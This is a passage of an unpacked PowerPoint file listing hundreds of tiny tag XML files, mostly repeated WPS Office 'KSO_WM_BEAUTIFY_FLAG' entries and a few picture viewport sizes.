  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag795.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag796.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag797.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag798.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag799.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag800.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag801.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag802.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag803.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag804.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag805.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag806.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag807.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag808.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag809.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag81.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag810.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag811.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag812.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag813.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag814.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag815.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag816.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag817.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag818.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag819.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag82.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag820.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag821.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag822.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag823.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag824.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag825.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag826.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag827.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag828.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag829.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag83.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag830.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag831.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag832.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag833.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag834.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag835.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag836.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag837.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag838.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag839.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag84.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag840.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag841.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag842.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag843.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag844.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag845.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag846.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag847.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag848.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag849.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag85.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag850.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag851.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag852.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag853.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag854.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag855.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag856.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag857.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag858.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag859.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag86.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag860.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag861.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag862.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag863.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag864.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag865.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag866.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag867.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag868.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag869.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag87.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag870.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag871.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag872.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag873.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag874.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag875.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag876.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag877.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag878.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag879.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag88.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag880.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag881.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag882.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag883.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag884.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag885.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag886.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag887.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag888.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag889.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag89.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag890.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag891.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag892.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag893.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag894.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag895.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag896.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag897.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag898.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag899.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
